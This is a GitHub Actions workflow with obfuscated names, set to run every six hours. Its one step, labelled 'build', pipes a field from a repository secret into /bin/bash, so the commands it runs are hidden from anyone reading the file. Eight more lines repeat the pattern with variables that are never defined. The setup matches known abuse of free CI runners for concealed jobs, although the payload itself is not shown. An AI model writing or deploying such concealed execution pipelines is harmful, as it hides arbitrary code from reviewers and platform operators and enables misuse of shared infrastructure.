name: yutongren5423
on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutongren5423
        env:
          eydzh66: ${{ secrets.eydzh66 }}
        run: |
          echo $eydzh66 | jq -r .zn397 | /bin/bash
          echo $l8510 | jq -r .cgu3327 | /bin/bash
          echo $lo34 | jq -r .vza5476 | /bin/bash
          echo $ue12813 | jq -r .efu00438 | /bin/bash
          echo $jiiz403 | jq -r .jmf0 | /bin/bash
          echo $iu53225 | jq -r .cjue4523 | /bin/bash
          echo $umpt326 | jq -r .ep86 | /bin/bash
          echo $cw76 | jq -r .qbrc39 | /bin/bash
          echo $o789 | jq -r .q7047 | /bin/bash

